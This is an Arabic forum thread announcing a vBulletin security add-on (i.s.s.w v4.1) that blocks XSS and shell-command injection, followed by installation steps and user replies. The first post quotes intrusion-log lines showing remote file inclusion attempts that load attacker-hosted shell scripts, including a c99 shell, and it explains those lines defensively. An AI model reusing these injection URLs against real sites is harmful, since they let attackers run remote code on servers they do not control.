+ الرد على الموضوع
صفحة 1 من 2 1 2 الأخيرةالأخيرة
النتائج 1 إلى 10 من 14

الموضوع: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

  1. #1
    الصورة الرمزية The Puinsher
    تاريخ التسجيل
    Apr 2008
    الدولة
    In My Server Beside Php
    العمر
    24
    المشاركات
    399

    Thumbs up الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    السلام عليكم ورحمة الله وبركاته

    اسم المنتج : حماية المنتدي i.s.s.w
    الإصدار : i.s.s.w v 4.1
    المبرمجين : الفريق الامني M.M.A i.s.s.w
    جديد الاصدار :
    1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
    2: امكانية التحكم في الصفحة التي تعرض للمخترق
    3: اضافه لوحت تحكم مختصره cp vb
    4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
    5 : تنبية في التحديث
    6: تعديلات في عمل الهاك وتحديثة
    7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
    8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
    9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

    نطلب الدعاء لنا في التوفيق وثبات الايمان
    اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني


    http://www.mwadah.com/imgcache/33984.imgcache

    عمل الهاك : حماية المنتدى بشكل كامل بعون الله




    http://www.mwadah.com/imgcache/33985.imgcache

    http://www.mwadah.com/imgcache/33986.imgcache


    الخيار الاول : لتشغيل حمايه المنتدي

    منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

    منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

    حجب عدة مواقع تساعد على العبث في المنتديات

    تطوير للدوال القديمة للتوافق معه السيرفر

    منع اكثر اوامر اليونكس وحيل الحقن في الشيل

    اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

    الخيار الثاني :
    منع اكواد التحويل لاخر عشر مواضيع
    والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


    الان نأتي للقسم الاكثر اثارة للموضوع

    عند دخولك مجلد sec

    افتح الملف logfile_hacker.txt

    ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

    كود PHP:
     2007-12-1105:50:441197370244209.67.223.188p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
    2007-12-1106:32:221197372742203.211.135.147t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

    2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
    2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 
    الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

    طبعا الفاصلة تفصل بين كل معلومه ومعلومة

    ,

    التاريخ والوقت
    كود PHP:
     2007-12-1105:50:44

    عدد المحاولات
    كود PHP:
     1197370244 
    ايبي الموقع المصااب
    كود PHP:
     209.67.223.188 
    الاصابة طبعا تشفرت لاغراض امنيه
    كود PHP:
     p=11575//codebb/lang_select 
    الاستغلال
    كود PHP:
     ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 
    نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
    يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
    كود PHP:
     libwww-perl/5.808 

    الان شرح التركيب

    امسح جميع هاكات لها علاقه في الحمايه او منع xss

    اما من ركب هاك الحمايه issw v4.0 issw v3

    عليه فقط حذف ملف البرودكت

    وتركيب المحدث


    شرح حذف الهاك


    من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

    ومن ثم حذف توابعه

    ---------------------------------------------------------------------------
    التركيب
    لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
    upload
    ارفع المجلد sec
    الى مجلد المنتدي الرئيسي
    اعطي التصريح 666 counter.txt logfile_hacker.txt

    وارفع cpnav_issw
    داخل
    vb\includes\xml
    قوم باستدعاء البروديكت من لوحت تحكم المنتدي

    واتمنى لكم النجاح في التنصيب
    ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

    مع
    تحيات الفريق الامني

    الان من لوحت تحكم المنتدي قم برفع البرودكت


    تم تجربت المنتج على الاصدار

    3.6.x

    3.7.0


    لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

    يطرحه هنا في الموضوع لنصل لتطوير اكثر


    وجل من لا يخطأ وشكرا لكم


    لتتبع جديد الهاك على الرابط التالي

    http://www.is-sw.net/index.php?issw=isswvb

    الحمد لله على كل شيء

    لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
    وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

    اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
    وشكرا لكم

    رابط الموضوع الاصلي
    http://www.is-sw.net/vb/showthread.php?t=4329


    الملفات المرفقة
      لا تستطيع تحميل المرفق قبل الرد
    اللهم انت ربي لا اله الا أنت خلقتني وأنا عبدك وأنا على عهدك ووعدك ما استطعت ..
    أعوذ بك من شر ما صنعت ..
    ابوء لك بنعمتك علي وأبوء بذنبي فأغفر لي فأنه لا يغفر الذنوب الا أنت ....



    صمتـے لغتـے ... فأعذرونـے فـے قلـہ كلامـے
    إبليس : العجب لبني آدم ! يحبون الله ويعصونه ، ويبغضونني ويطيعونني

    ܔْށThe Puinsherܔْށ
    البريد للدعم الفني فقط :- soliman.gharieb@yahoo.com

  2. #2
    الصورة الرمزية mr.r9a9
    تاريخ التسجيل
    Apr 2008
    المشاركات
    28

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    مشكور جدا جدا اخوي
    هذا الهاك معروف للفريق الامني الشهير
    اللى اجتاز باشهر السكربتات

  3. #3
    الصورة الرمزية ksa1
    تاريخ التسجيل
    May 2008
    المشاركات
    2

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    تم التركيب بارك الله فيكم

    ولكن هنالك نقطة واحدة تعيب الهاك وهيا الأي بي بمعنا لو كونت خارج منزلك لا يمكنك الدخول للوحة التحكم
    + بإن هنالك إداري بالمنتدي وهنا لايمكنهم الدخول للوحة التحكم لأستوجاب إى بي واحد فقط لا غير

    اشكر لكم عملكم الكبير وان شاء الله نراء الهاك في تطور مستمر

  4. #4
    الصورة الرمزية الحلم العماني
    تاريخ التسجيل
    Feb 2004
    العمر
    22
    المشاركات
    3

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    تسلم يالغالي

  5. #5
    الصورة الرمزية تلميذ الوافى
    تاريخ التسجيل
    May 2008
    المشاركات
    5

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    شكرا لك اخى الغالى
    ولى سؤال هام
    بالنسبة لمن قام بتغير اسماء ملفات المنتدى
    هل يجب اعادت اسمائها كما كانت؟
    ام يمكن ان يعمل مع تغير الاسماء ؟
    انتظر ردك

  6. #6
    الصورة الرمزية The Puinsher
    تاريخ التسجيل
    Apr 2008
    الدولة
    In My Server Beside Php
    العمر
    24
    المشاركات
    399

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    مشكورين اخوانى على المرور


    اخي تلميذ الوافي لا يجب اعاده تسميه الملفات فقط من اعدادت الهاك قم بتغيير اسم ملف الكونفنج لو كنت غيرته مسبقا


    خالص تحياتي
    اللهم انت ربي لا اله الا أنت خلقتني وأنا عبدك وأنا على عهدك ووعدك ما استطعت ..
    أعوذ بك من شر ما صنعت ..
    ابوء لك بنعمتك علي وأبوء بذنبي فأغفر لي فأنه لا يغفر الذنوب الا أنت ....



    صمتـے لغتـے ... فأعذرونـے فـے قلـہ كلامـے
    إبليس : العجب لبني آدم ! يحبون الله ويعصونه ، ويبغضونني ويطيعونني

    ܔْށThe Puinsherܔْށ
    البريد للدعم الفني فقط :- soliman.gharieb@yahoo.com

  7. #7
    الصورة الرمزية دموع الوفا
    تاريخ التسجيل
    Feb 2004
    الدولة
    مدينة الدموع
    العمر
    18
    المشاركات
    362

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    والله العظيم دماااااااااار شامل هذا الهاك

    كفانا شر كل الهكرز

    بارك الله فيهم فريق i.s.s.w
    Coming SOON

  8. #8
    الصورة الرمزية mesam
    تاريخ التسجيل
    Jul 2008
    المشاركات
    10

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    جزاك الله خيرااا
    سبحان الله وبحمده .. سبحان الله العظيم

  9. #9
    الصورة الرمزية doort
    تاريخ التسجيل
    Jul 2008
    المشاركات
    19

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني



    لدي أسئلة أتمنى من الفريق الإجابة عليها

    هل هذا الهاك يكفي لحماية المنتدى؟
    وممكن مع هذا الهاك مثلاً التعديل على بعض الملفات وتغيير مسمياتها .؟
    وهل وجدت منتديات تم اختراقها مع هذا الهاك ؟
    طبعا هذا لايقلل من قيمتكم ومجهودكم
    فقط للإطمئنان

  10. #10
    الصورة الرمزية ابو مجاهد.
    تاريخ التسجيل
    Sep 2008
    المشاركات
    1

    افتراضي رد: الحمايه الجبارة للمنتديات حمايه كامله من جميع الثغرات i.s.s.w v4.1 للفريق الأمني

    أريد رابط مباشر لتحميل الهاك
    ضرورى

+ الرد على الموضوع
صفحة 1 من 2 1 2 الأخيرةالأخيرة

مواقع النشر (المفضلة)

مواقع النشر (المفضلة)

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك